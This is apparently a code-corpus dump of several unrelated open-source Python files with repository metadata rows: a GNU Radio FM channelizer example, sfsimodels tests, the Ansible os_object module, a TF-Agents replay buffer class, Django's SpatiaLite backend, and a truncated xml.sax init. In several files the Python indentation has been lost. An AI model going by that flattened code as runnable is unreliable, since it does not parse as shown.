# Perform an opening operation on the background data.
fgmask = nd.binary_opening(fgmask, structure=struc).astype(np.uint8)
return fgmask
| bsd-3-clause | 2,908,086,904,442,594,000 | -628,872,158,545,571,500 | 32.726135 | 97 | 0.62605 | false |
analogdevicesinc/gnuradio | gr-analog/examples/fmtest.py | 40 | 7941 | #!/usr/bin/env python
#
# Copyright 2009,2012,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr
from gnuradio import blocks
from gnuradio import filter
from gnuradio import analog
from gnuradio import channels
import sys, math, time
try:
import scipy
from scipy import fftpack
except ImportError:
print "Error: Program requires scipy (see: www.scipy.org)."
sys.exit(1)
try:
import pylab
except ImportError:
print "Error: Program requires matplotlib (see: matplotlib.sourceforge.net)."
sys.exit(1)
class fmtx(gr.hier_block2):
def __init__(self, lo_freq, audio_rate, if_rate):
gr.hier_block2.__init__(self, "build_fm",
gr.io_signature(1, 1, gr.sizeof_float),
gr.io_signature(1, 1, gr.sizeof_gr_complex))
fmtx = analog.nbfm_tx(audio_rate, if_rate, max_dev=5e3, tau=75e-6)
# Local oscillator
lo = analog.sig_source_c(if_rate, # sample rate
analog.GR_SIN_WAVE, # waveform type
lo_freq, # frequency
1.0, # amplitude
0) # DC Offset
mixer = blocks.multiply_cc()
self.connect(self, fmtx, (mixer, 0))
self.connect(lo, (mixer, 1))
self.connect(mixer, self)
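# Standalone sketch (values are illustrative, not taken from the test below): an
# fmtx block that narrowband-FM modulates 8 kHz float audio and mixes it up to a
# +16 kHz offset within a 160 kHz complex IF stream.
#
#   tx = fmtx(lo_freq=16000, audio_rate=8000, if_rate=160000)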
class fmtest(gr.top_block):
def __init__(self):
gr.top_block.__init__(self)
self._nsamples = 1000000
self._audio_rate = 8000
# Set up N channels with their own baseband and IF frequencies
self._N = 5
chspacing = 16000
freq = [10, 20, 30, 40, 50]
f_lo = [0, 1*chspacing, -1*chspacing, 2*chspacing, -2*chspacing]
self._if_rate = 4*self._N*self._audio_rate
# Create a signal source and frequency modulate it
self.sum = blocks.add_cc()
for n in xrange(self._N):
sig = analog.sig_source_f(self._audio_rate, analog.GR_SIN_WAVE, freq[n], 0.5)
fm = fmtx(f_lo[n], self._audio_rate, self._if_rate)
self.connect(sig, fm)
self.connect(fm, (self.sum, n))
self.head = blocks.head(gr.sizeof_gr_complex, self._nsamples)
self.snk_tx = blocks.vector_sink_c()
self.channel = channels.channel_model(0.1)
self.connect(self.sum, self.head, self.channel, self.snk_tx)
        # Design the channelizer
self._M = 10
bw = chspacing/2.0
t_bw = chspacing/10.0
self._chan_rate = self._if_rate / self._M
self._taps = filter.firdes.low_pass_2(1, self._if_rate, bw, t_bw,
attenuation_dB=100,
window=filter.firdes.WIN_BLACKMAN_hARRIS)
tpc = math.ceil(float(len(self._taps)) / float(self._M))
print "Number of taps: ", len(self._taps)
print "Number of channels: ", self._M
print "Taps per channel: ", tpc
self.pfb = filter.pfb.channelizer_ccf(self._M, self._taps)
self.connect(self.channel, self.pfb)
        # Create an NBFM receiver, squelch and vector sink for each of the M
        # channelizer outputs and connect them
self.fmdet = list()
self.squelch = list()
self.snks = list()
for i in xrange(self._M):
self.fmdet.append(analog.nbfm_rx(self._audio_rate, self._chan_rate))
self.squelch.append(analog.standard_squelch(self._audio_rate*10))
self.snks.append(blocks.vector_sink_f())
self.connect((self.pfb, i), self.fmdet[i], self.squelch[i], self.snks[i])
def num_tx_channels(self):
return self._N
def num_rx_channels(self):
return self._M
def main():
fm = fmtest()
tstart = time.time()
fm.run()
tend = time.time()
if 1:
fig1 = pylab.figure(1, figsize=(12,10), facecolor="w")
fig2 = pylab.figure(2, figsize=(12,10), facecolor="w")
fig3 = pylab.figure(3, figsize=(12,10), facecolor="w")
Ns = 10000
Ne = 100000
fftlen = 8192
winfunc = scipy.blackman
# Plot transmitted signal
fs = fm._if_rate
d = fm.snk_tx.data()[Ns:Ns+Ne]
sp1_f = fig1.add_subplot(2, 1, 1)
X,freq = sp1_f.psd(d, NFFT=fftlen, noverlap=fftlen/4, Fs=fs,
window = lambda d: d*winfunc(fftlen),
visible=False)
X_in = 10.0*scipy.log10(abs(fftpack.fftshift(X)))
f_in = scipy.arange(-fs/2.0, fs/2.0, fs/float(X_in.size))
p1_f = sp1_f.plot(f_in, X_in, "b")
sp1_f.set_xlim([min(f_in), max(f_in)+1])
sp1_f.set_ylim([-120.0, 20.0])
sp1_f.set_title("Input Signal", weight="bold")
sp1_f.set_xlabel("Frequency (Hz)")
sp1_f.set_ylabel("Power (dBW)")
Ts = 1.0/fs
Tmax = len(d)*Ts
t_in = scipy.arange(0, Tmax, Ts)
x_in = scipy.array(d)
sp1_t = fig1.add_subplot(2, 1, 2)
p1_t = sp1_t.plot(t_in, x_in.real, "b-o")
#p1_t = sp1_t.plot(t_in, x_in.imag, "r-o")
sp1_t.set_ylim([-5, 5])
# Set up the number of rows and columns for plotting the subfigures
Ncols = int(scipy.floor(scipy.sqrt(fm.num_rx_channels())))
Nrows = int(scipy.floor(fm.num_rx_channels() / Ncols))
if(fm.num_rx_channels() % Ncols != 0):
Nrows += 1
        # Plot each of the channels' outputs: frequencies on Figure 2 and
# time signals on Figure 3
fs_o = fm._audio_rate
for i in xrange(len(fm.snks)):
# remove issues with the transients at the beginning
# also remove some corruption at the end of the stream
# this is a bug, probably due to the corner cases
d = fm.snks[i].data()[Ns:Ne]
sp2_f = fig2.add_subplot(Nrows, Ncols, 1+i)
X,freq = sp2_f.psd(d, NFFT=fftlen, noverlap=fftlen/4, Fs=fs_o,
window = lambda d: d*winfunc(fftlen),
visible=False)
#X_o = 10.0*scipy.log10(abs(fftpack.fftshift(X)))
X_o = 10.0*scipy.log10(abs(X))
#f_o = scipy.arange(-fs_o/2.0, fs_o/2.0, fs_o/float(X_o.size))
f_o = scipy.arange(0, fs_o/2.0, fs_o/2.0/float(X_o.size))
p2_f = sp2_f.plot(f_o, X_o, "b")
sp2_f.set_xlim([min(f_o), max(f_o)+0.1])
sp2_f.set_ylim([-120.0, 20.0])
sp2_f.grid(True)
sp2_f.set_title(("Channel %d" % i), weight="bold")
sp2_f.set_xlabel("Frequency (kHz)")
sp2_f.set_ylabel("Power (dBW)")
Ts = 1.0/fs_o
Tmax = len(d)*Ts
t_o = scipy.arange(0, Tmax, Ts)
x_t = scipy.array(d)
sp2_t = fig3.add_subplot(Nrows, Ncols, 1+i)
p2_t = sp2_t.plot(t_o, x_t.real, "b")
p2_t = sp2_t.plot(t_o, x_t.imag, "r")
sp2_t.set_xlim([min(t_o), max(t_o)+1])
sp2_t.set_ylim([-1, 1])
sp2_t.set_xlabel("Time (s)")
sp2_t.set_ylabel("Amplitude")
pylab.show()
if __name__ == "__main__":
main()
| gpl-3.0 | -8,652,132,297,931,338,000 | 2,658,118,173,485,160,400 | 33.676856 | 89 | 0.549805 | false |
eng-tools/sfsimodels | tests/test_interaction.py | 1 | 2586 | from sfsimodels import models
import sfsimodels as sm
import json
import numpy as np
def test_link_building_and_soil():
number_of_storeys = 6
interstorey_height = 3.4 # m
n_bays = 3
fb = models.FrameBuilding(number_of_storeys, n_bays)
fb.id = 1
fb.interstorey_heights = interstorey_height * np.ones(number_of_storeys)
fb.floor_length = 18.0 # m
fb.floor_width = 16.0 # m
fd = models.RaftFoundation()
fd.length = 4
fd.width = 6
fd.height = 0.0
fd.density = 3
fd2 = models.RaftFoundation()
fd2.length = 14
fd2.width = 16
fd2.height = 10.0
fd2.density = 13
# link building to foundation
fd.set_building(fb, two_way=False)
assert fd.building.n_bays == 3
assert fb.foundation is None
fd.set_building(fb, two_way=True)
assert fb.foundation.length == 4
# one way link
fb.set_foundation(fd2, two_way=False)
assert fb.foundation.length == 14
assert fd2.building is None
fb.set_foundation(fd2, two_way=True)
assert fb.foundation.length == 14
assert np.isclose(fd2.building.floor_width, 16.0)
structure = models.SDOFBuilding()
structure.set_foundation(fd, two_way=True)
assert structure.foundation.width == 6
assert isinstance(fd.building, models.SDOFBuilding)
def test_save_and_load_w_linked_building_and_soil():
number_of_storeys = 6
interstorey_height = 3.4 # m
wb = models.WallBuilding(number_of_storeys)
wb.id = 1
wb.interstorey_heights = interstorey_height * np.ones(number_of_storeys)
wb.floor_length = 18.0 # m
wb.floor_width = 16.0 # m
fd = models.RaftFoundation()
fd.length = 4
fd.width = 6
fd.height = 0.0
fd.density = 3
fd.id = 1
# link building to foundation
fd.set_building(wb, two_way=False)
assert fd.building.n_storeys == number_of_storeys
assert wb.foundation is None
fd.set_building(wb, two_way=True)
assert wb.foundation.length == 4
ecp_output = sm.Output()
ecp_output.add_to_dict(wb)
ecp_output.add_to_dict(fd)
ecp_output.name = "a single wall building"
ecp_output.units = "N, kg, m, s"
ecp_output.comments = ""
p_str = json.dumps(ecp_output.to_dict(), skipkeys=["__repr__"], indent=4)
objs = sm.loads_json(p_str)
building = objs["building"][1]
foundation = objs["foundation"][1]
assert foundation.width == 6
assert building.foundation.width == 6, building.fd
assert np.isclose(building.floor_length, 18.0)
if __name__ == '__main__':
test_save_and_load_w_linked_building_and_soil() | mit | 2,428,146,279,325,334,000 | 5,288,080,863,899,878,000 | 27.119565 | 77 | 0.650812 | false |
incaser/odoo-odoo | addons/l10n_de/__init__.py | 693 | 1057 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -5,605,323,569,114,361,000 | 6,987,471,378,879,419,000 | 44.956522 | 79 | 0.606433 | false |
stianvi/ansible-modules-core | cloud/openstack/os_object.py | 58 | 4111 | #!/usr/bin/python
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2013, Benno Joy <[email protected]>
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
try:
import shade
HAS_SHADE = True
except ImportError:
HAS_SHADE = False
DOCUMENTATION = '''
---
module: os_object
short_description: Create or Delete objects and containers from OpenStack
version_added: "2.0"
author: "Monty Taylor (@emonty)"
extends_documentation_fragment: openstack
description:
- Create or Delete objects and containers from OpenStack
options:
container:
description:
- The name of the container in which to create the object
required: true
name:
description:
- Name to be give to the object. If omitted, operations will be on
the entire container
required: false
filename:
description:
- Path to local file to be uploaded.
required: false
container_access:
description:
- desired container access level.
required: false
choices: ['private', 'public']
default: private
state:
description:
- Should the resource be present or absent.
choices: [present, absent]
default: present
'''
EXAMPLES = '''
# Creates a object named 'fstab' in the 'config' container
- os_object: cloud=mordred state=present name=fstab container=config filename=/etc/fstab
# Deletes a container called config and all of its contents
- os_object: cloud=rax-iad state=absent container=config
'''
def process_object(
cloud_obj, container, name, filename, container_access, **kwargs):
changed = False
container_obj = cloud_obj.get_container(container)
if kwargs['state'] == 'present':
if not container_obj:
container_obj = cloud_obj.create_container(container)
changed = True
if cloud_obj.get_container_access(container) != container_access:
cloud_obj.set_container_access(container, container_access)
changed = True
if name:
if cloud_obj.is_object_stale(container, name, filename):
cloud_obj.create_object(container, name, filename)
changed = True
else:
if container_obj:
if name:
if cloud_obj.get_object_metadata(container, name):
cloud_obj.delete_object(container, name)
                    changed = True
else:
cloud_obj.delete_container(container)
                changed = True
return changed
def main():
argument_spec = openstack_full_argument_spec(
name=dict(required=False, default=None),
container=dict(required=True),
filename=dict(required=False, default=None),
container_access=dict(default='private', choices=['private', 'public']),
state=dict(default='present', choices=['absent', 'present']),
)
module_kwargs = openstack_module_kwargs()
module = AnsibleModule(argument_spec, **module_kwargs)
if not HAS_SHADE:
module.fail_json(msg='shade is required for this module')
try:
cloud = shade.openstack_cloud(**module.params)
changed = process_object(cloud, **module.params)
module.exit_json(changed=changed)
except shade.OpenStackCloudException as e:
module.fail_json(msg=str(e))
# this is magic, see lib/ansible/module_common.py
from ansible.module_utils.basic import *
from ansible.module_utils.openstack import *
if __name__ == "__main__":
main()
| gpl-3.0 | 8,272,088,370,793,105,000 | 6,798,099,357,158,851,000 | 31.370079 | 88 | 0.668207 | false |
philoniare/horizon | openstack_dashboard/test/integration_tests/tests/test_sahara_image_registry.py | 37 | 2145 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack_dashboard.test.integration_tests import helpers
from openstack_dashboard.test.integration_tests.tests import decorators
IMAGE_NAME = helpers.gen_random_resource_name("image")
@decorators.services_required("sahara")
class TestSaharaImageRegistry(helpers.TestCase):
def setUp(self):
super(TestSaharaImageRegistry, self).setUp()
image_pg = self.home_pg.go_to_compute_imagespage()
image_pg.create_image(IMAGE_NAME)
image_pg.wait_until_image_active(IMAGE_NAME)
def test_image_register_unregister(self):
"""Test the image registration in Sahara."""
image_reg_pg = self.home_pg.go_to_dataprocessing_imageregistrypage()
image_reg_pg.register_image(IMAGE_NAME, self.CONFIG.scenario.ssh_user,
"Test description")
image_reg_pg.wait_until_image_registered(IMAGE_NAME)
self.assertTrue(image_reg_pg.is_image_registered(IMAGE_NAME),
"Image was not registered.")
self.assertFalse(image_reg_pg.is_error_message_present(),
"Error message occurred during image creation.")
image_reg_pg.unregister_image(IMAGE_NAME)
self.assertFalse(image_reg_pg.is_error_message_present())
self.assertFalse(image_reg_pg.is_image_registered(IMAGE_NAME),
"Image was not unregistered.")
def tearDown(self):
image_pg = self.home_pg.go_to_compute_imagespage()
image_pg.delete_image(IMAGE_NAME)
super(TestSaharaImageRegistry, self).tearDown()
| apache-2.0 | 129,877,133,685,121,260 | 4,072,309,267,724,292,000 | 45.630435 | 78 | 0.683916 | false |
tensorflow/agents | tf_agents/replay_buffers/replay_buffer.py | 1 | 13019 | # coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TF-Agents Replay Buffer API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import tensorflow as tf
from tf_agents.utils import common
from tensorflow.python.data.util import nest as data_nest # pylint:disable=g-direct-tensorflow-import # TF internal
from tensorflow.python.util import deprecation # pylint:disable=g-direct-tensorflow-import # TF internal
class ReplayBuffer(tf.Module):
"""Abstract base class for TF-Agents replay buffer.
In eager mode, methods modify the buffer or return values directly. In graph
mode, methods return ops that do so when executed.
"""
def __init__(self, data_spec, capacity, stateful_dataset=False):
"""Initializes the replay buffer.
Args:
data_spec: A spec or a list/tuple/nest of specs describing a single item
that can be stored in this buffer
capacity: number of elements that the replay buffer can hold.
stateful_dataset: whether the dataset contains stateful ops or not.
"""
super(ReplayBuffer, self).__init__()
common.check_tf1_allowed()
self._data_spec = data_spec
self._capacity = capacity
self._stateful_dataset = stateful_dataset
@property
def data_spec(self):
"""Returns the spec for items in the replay buffer."""
return self._data_spec
@property
def capacity(self):
"""Returns the capacity of the replay buffer."""
return self._capacity
@property
def stateful_dataset(self):
"""Returns whether the dataset of the replay buffer has stateful ops."""
return self._stateful_dataset
def num_frames(self):
"""Returns the number of frames in the replay buffer."""
return self._num_frames()
def add_batch(self, items):
"""Adds a batch of items to the replay buffer.
Args:
items: An item or list/tuple/nest of items to be added to the replay
buffer. `items` must match the data_spec of this class, with a
batch_size dimension added to the beginning of each tensor/array.
Returns:
Adds `items` to the replay buffer.
"""
return self._add_batch(items)
@deprecation.deprecated(
date=None,
instructions=(
          'Use `as_dataset(..., single_deterministic_pass=False)` instead.'
))
def get_next(self, sample_batch_size=None, num_steps=None, time_stacked=True):
"""Returns an item or batch of items from the buffer.
Args:
sample_batch_size: (Optional.) An optional batch_size to specify the
number of items to return. If None (default), a single item is returned
which matches the data_spec of this class (without a batch dimension).
Otherwise, a batch of sample_batch_size items is returned, where each
tensor in items will have its first dimension equal to sample_batch_size
and the rest of the dimensions match the corresponding data_spec. See
examples below.
num_steps: (Optional.) Optional way to specify that sub-episodes are
desired. If None (default), in non-episodic replay buffers, a batch of
single items is returned. In episodic buffers, full episodes are
returned (note that sample_batch_size must be None in that case).
Otherwise, a batch of sub-episodes is returned, where a sub-episode is a
sequence of consecutive items in the replay_buffer. The returned tensors
will have first dimension equal to sample_batch_size (if
sample_batch_size is not None), subsequent dimension equal to num_steps,
if time_stacked=True and remaining dimensions which match the data_spec
of this class. See examples below.
time_stacked: (Optional.) Boolean, when true and num_steps > 1 it returns
the items stacked on the time dimension. See examples below for details.
    Examples of tensor shapes returned (B = batch size, T = timestep,
    D = data spec):

      get_next(sample_batch_size=None, num_steps=None, time_stacked=True)
        return shape (non-episodic): [D]
        return shape (episodic): [T, D] (T = full length of the episode)

      get_next(sample_batch_size=B, num_steps=None, time_stacked=True)
        return shape (non-episodic): [B, D]
        return shape (episodic): Not supported

      get_next(sample_batch_size=B, num_steps=T, time_stacked=True)
        return shape: [B, T, D]

      get_next(sample_batch_size=None, num_steps=T, time_stacked=False)
        return shape: ([D], [D], ..) T tensors in the tuple

      get_next(sample_batch_size=B, num_steps=T, time_stacked=False)
        return shape: ([B, D], [B, D], ..) T tensors in the tuple
Returns:
A 2-tuple containing:
- An item or sequence of (optionally batched and stacked) items.
- Auxiliary info for the items (i.e. ids, probs).
"""
return self._get_next(sample_batch_size, num_steps, time_stacked)
def as_dataset(self,
sample_batch_size=None,
num_steps=None,
num_parallel_calls=None,
sequence_preprocess_fn=None,
single_deterministic_pass=False):
"""Creates and returns a dataset that returns entries from the buffer.
A single entry from the dataset is the result of the following pipeline:
* Sample sequences from the underlying data store
* (optionally) Process them with `sequence_preprocess_fn`,
* (optionally) Split them into subsequences of length `num_steps`
* (optionally) Batch them into batches of size `sample_batch_size`.
In practice, this pipeline is executed in parallel as much as possible
if `num_parallel_calls != 1`.
Some additional notes:
If `num_steps is None`, different replay buffers will behave differently.
For example, `TFUniformReplayBuffer` will return single time steps without
a time dimension. In contrast, e.g., `EpisodicReplayBuffer` will return
full sequences (since each sequence may be an episode of unknown length,
the outermost shape dimension will be `None`).
If `sample_batch_size is None`, no batching is performed; and there is no
outer batch dimension in the returned Dataset entries. This setting
is useful with variable episode lengths using e.g. `EpisodicReplayBuffer`,
because it allows the user to get full episodes back, and use `tf.data`
to build padded or truncated batches themselves.
    If `single_deterministic_pass == True`, the replay buffer will make
every attempt to ensure every time step is visited once and exactly once
in a deterministic manner (though true determinism depends on the
underlying data store). Additional work may be done to ensure minibatches
do not have multiple rows from the same episode. In some cases, this
may mean arguments like `num_parallel_calls` are ignored.
Args:
sample_batch_size: (Optional.) An optional batch_size to specify the
number of items to return. If None (default), a single item is returned
which matches the data_spec of this class (without a batch dimension).
Otherwise, a batch of sample_batch_size items is returned, where each
tensor in items will have its first dimension equal to sample_batch_size
and the rest of the dimensions match the corresponding data_spec.
num_steps: (Optional.) Optional way to specify that sub-episodes are
desired. If None (default), a batch of single items is returned.
Otherwise, a batch of sub-episodes is returned, where a sub-episode is a
sequence of consecutive items in the replay_buffer. The returned tensors
will have first dimension equal to sample_batch_size (if
sample_batch_size is not None), subsequent dimension equal to num_steps,
and remaining dimensions which match the data_spec of this class.
num_parallel_calls: (Optional.) A `tf.int32` scalar `tf.Tensor`,
representing the number elements to process in parallel. If not
specified, elements will be processed sequentially.
sequence_preprocess_fn: (Optional) fn for preprocessing the collected
data before it is split into subsequences of length `num_steps`.
Defined in `TFAgent.preprocess_sequence`. Defaults to pass through.
single_deterministic_pass: Python boolean. If `True`, the dataset will
return a single deterministic pass through its underlying data.
**NOTE**: If the buffer is modified while a Dataset iterator is
iterating over this data, the iterator may miss any new data or
otherwise have subtly invalid data.
Returns:
A dataset of type tf.data.Dataset, elements of which are 2-tuples of:
- An item or sequence of items or batch thereof
- Auxiliary info for the items (i.e. ids, probs).
Raises:
NotImplementedError: If a non-default argument value is not supported.
ValueError: If the data spec contains lists that must be converted to
tuples.
"""
# data_tf.nest.flatten does not flatten python lists, nest.flatten does.
if tf.nest.flatten(self._data_spec) != data_nest.flatten(self._data_spec):
raise ValueError(
'Cannot perform gather; data spec contains lists and this conflicts '
'with gathering operator. Convert any lists to tuples. '
'For example, if your spec looks like [a, b, c], '
'change it to (a, b, c). Spec structure is:\n {}'.format(
tf.nest.map_structure(lambda spec: spec.dtype, self._data_spec)))
if single_deterministic_pass:
ds = self._single_deterministic_pass_dataset(
sample_batch_size=sample_batch_size,
num_steps=num_steps,
sequence_preprocess_fn=sequence_preprocess_fn,
num_parallel_calls=num_parallel_calls)
else:
ds = self._as_dataset(
sample_batch_size=sample_batch_size,
num_steps=num_steps,
sequence_preprocess_fn=sequence_preprocess_fn,
num_parallel_calls=num_parallel_calls)
if self._stateful_dataset:
options = tf.data.Options()
if hasattr(options, 'experimental_allow_stateful'):
options.experimental_allow_stateful = True
ds = ds.with_options(options)
return ds
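  # Usage sketch (assumes a concrete subclass, e.g. TFUniformReplayBuffer, has
  # been created as `replay_buffer` and filled via add_batch):
  #
  #   dataset = replay_buffer.as_dataset(
  #       sample_batch_size=32, num_steps=2, num_parallel_calls=3)
  #   experience, info = next(iter(dataset))
  #   # each tensor in `experience` has shape [32, 2, ...]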
@deprecation.deprecated(
date=None,
instructions=(
'Use `as_dataset(..., single_deterministic_pass=True)` instead.'
))
def gather_all(self):
"""Returns all the items in buffer.
Returns:
Returns all the items currently in the buffer. Returns a tensor
of shape [B, T, ...] where B = batch size, T = timesteps,
and the remaining shape is the shape spec of the items in the buffer.
"""
return self._gather_all()
def clear(self):
"""Resets the contents of replay buffer.
Returns:
Clears the replay buffer contents.
"""
return self._clear()
# Subclasses must implement these methods.
@abc.abstractmethod
def _num_frames(self):
"""Returns the number of frames in the replay buffer."""
raise NotImplementedError
@abc.abstractmethod
def _add_batch(self, items):
"""Adds a batch of items to the replay buffer."""
raise NotImplementedError
@abc.abstractmethod
def _get_next(self, sample_batch_size, num_steps, time_stacked):
"""Returns an item or batch of items from the buffer."""
raise NotImplementedError
@abc.abstractmethod
def _as_dataset(self,
sample_batch_size,
num_steps,
sequence_preprocess_fn,
num_parallel_calls):
"""Creates and returns a dataset that returns entries from the buffer."""
raise NotImplementedError
@abc.abstractmethod
def _single_deterministic_pass_dataset(self,
sample_batch_size,
num_steps,
sequence_preprocess_fn,
num_parallel_calls):
"""Creates and returns a dataset that returns entries from the buffer."""
raise NotImplementedError
@abc.abstractmethod
def _gather_all(self):
"""Returns all the items in buffer."""
raise NotImplementedError
@abc.abstractmethod
def _clear(self):
"""Clears the replay buffer."""
raise NotImplementedError
| apache-2.0 | 2,817,190,898,536,838,700 | -7,017,018,733,805,697,000 | 41.545752 | 117 | 0.675858 | false |
vitaly4uk/django | django/contrib/gis/db/backends/spatialite/base.py | 445 | 3615 | import sys
from ctypes.util import find_library
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db.backends.sqlite3.base import (
Database, DatabaseWrapper as SQLiteDatabaseWrapper, SQLiteCursorWrapper,
)
from django.utils import six
from .client import SpatiaLiteClient
from .features import DatabaseFeatures
from .introspection import SpatiaLiteIntrospection
from .operations import SpatiaLiteOperations
from .schema import SpatialiteSchemaEditor
class DatabaseWrapper(SQLiteDatabaseWrapper):
SchemaEditorClass = SpatialiteSchemaEditor
def __init__(self, *args, **kwargs):
# Before we get too far, make sure pysqlite 2.5+ is installed.
if Database.version_info < (2, 5, 0):
raise ImproperlyConfigured('Only versions of pysqlite 2.5+ are '
'compatible with SpatiaLite and GeoDjango.')
# Trying to find the location of the SpatiaLite library.
# Here we are figuring out the path to the SpatiaLite library
# (`libspatialite`). If it's not in the system library path (e.g., it
# cannot be found by `ctypes.util.find_library`), then it may be set
# manually in the settings via the `SPATIALITE_LIBRARY_PATH` setting.
self.spatialite_lib = getattr(settings, 'SPATIALITE_LIBRARY_PATH',
find_library('spatialite'))
if not self.spatialite_lib:
raise ImproperlyConfigured('Unable to locate the SpatiaLite library. '
'Make sure it is in your library path, or set '
'SPATIALITE_LIBRARY_PATH in your settings.'
)
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.features = DatabaseFeatures(self)
self.ops = SpatiaLiteOperations(self)
self.client = SpatiaLiteClient(self)
self.introspection = SpatiaLiteIntrospection(self)
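    # Example settings override when the library cannot be auto-detected
    # (the path below is illustrative and platform dependent):
    #
    #   SPATIALITE_LIBRARY_PATH = '/usr/lib/x86_64-linux-gnu/mod_spatialite.so'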
def get_new_connection(self, conn_params):
conn = super(DatabaseWrapper, self).get_new_connection(conn_params)
# Enabling extension loading on the SQLite connection.
try:
conn.enable_load_extension(True)
except AttributeError:
raise ImproperlyConfigured(
'The pysqlite library does not support C extension loading. '
'Both SQLite and pysqlite must be configured to allow '
'the loading of extensions to use SpatiaLite.')
# Loading the SpatiaLite library extension on the connection, and returning
# the created cursor.
cur = conn.cursor(factory=SQLiteCursorWrapper)
try:
cur.execute("SELECT load_extension(%s)", (self.spatialite_lib,))
except Exception as msg:
new_msg = (
'Unable to load the SpatiaLite library extension '
'"%s" because: %s') % (self.spatialite_lib, msg)
six.reraise(ImproperlyConfigured, ImproperlyConfigured(new_msg), sys.exc_info()[2])
cur.close()
return conn
def prepare_database(self):
super(DatabaseWrapper, self).prepare_database()
# Check if spatial metadata have been initialized in the database
with self.cursor() as cursor:
cursor.execute("PRAGMA table_info(geometry_columns);")
if cursor.fetchall() == []:
arg = "1" if self.features.supports_initspatialmetadata_in_one_transaction else ""
cursor.execute("SELECT InitSpatialMetaData(%s)" % arg)
| bsd-3-clause | 6,232,210,689,642,760,000 | 4,667,479,576,248,845,000 | 47.2 | 98 | 0.643707 | false |
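
The backend above locates the SpatiaLite shared library either via ctypes.util.find_library or via the SPATIALITE_LIBRARY_PATH setting, and loads it as an SQLite extension on every new connection. A hedged settings sketch follows; the library path and database file name are placeholders to adapt to the local system.

# Illustrative Django settings sketch; the paths below are assumptions.
SPATIALITE_LIBRARY_PATH = '/usr/lib/libspatialite.so'   # only needed if find_library('spatialite') fails

DATABASES = {
    'default': {
        'ENGINE': 'django.contrib.gis.db.backends.spatialite',
        'NAME': 'geo.db',   # SQLite file created on first migrate
    }
}
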
salguarnieri/intellij-community | python/lib/Lib/xml/sax/__init__.py | 117 | 3413 | """Simple API for XML (SAX) implementation for Python.
This module provides an implementation of the SAX 2 interface;
information about the Java version of the interface can be found at
http://www.megginson.com/SAX/. The Python version of the interface is
documented at <...>.
This package contains the following modules:
handler -- Base classes and constants which define the SAX 2 API for
the 'client-side' of SAX for Python.
saxutils -- Implementation of the convenience classes commonly used to
work with SAX.
xmlreader -- Base classes and constants which define the SAX 2 API for
the parsers used with SAX for Python.
drivers2 -- Contains the driver that wraps a Java sax implementation in python
objects.
"""
from xmlreader import InputSource
from handler import ContentHandler, ErrorHandler
from _exceptions import SAXException, SAXNotRecognizedException, \
SAXParseException, SAXNotSupportedException, \
SAXReaderNotAvailable
def parse(source, handler, errorHandler=ErrorHandler()):
parser = make_parser()
parser.setContentHandler(handler)
parser.setErrorHandler(errorHandler)
parser.parse(source)
def parseString(string, handler, errorHandler=ErrorHandler()):
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
if errorHandler is None:
errorHandler = ErrorHandler()
parser = make_parser()
parser.setContentHandler(handler)
parser.setErrorHandler(errorHandler)
inpsrc = InputSource()
inpsrc.setByteStream(StringIO(string))
parser.parse(inpsrc)
# this is the parser list used by the make_parser function if no
# alternatives are given as parameters to the function
default_parser_list = ["xml.sax.drivers2.drv_javasax"]
# tell modulefinder that importing sax potentially imports expatreader
_false = 0
if _false:
import xml.sax.drivers2.drv_javasax
import os, sys
if os.environ.has_key("PY_SAX_PARSER"):
default_parser_list = os.environ["PY_SAX_PARSER"].split(",")
del os
_key = "python.xml.sax.parser"
if sys.platform[:4] == "java" and sys.registry.containsKey(_key):
default_parser_list = sys.registry.getProperty(_key).split(",")
def make_parser(parser_list = []):
"""Creates and returns a SAX parser.
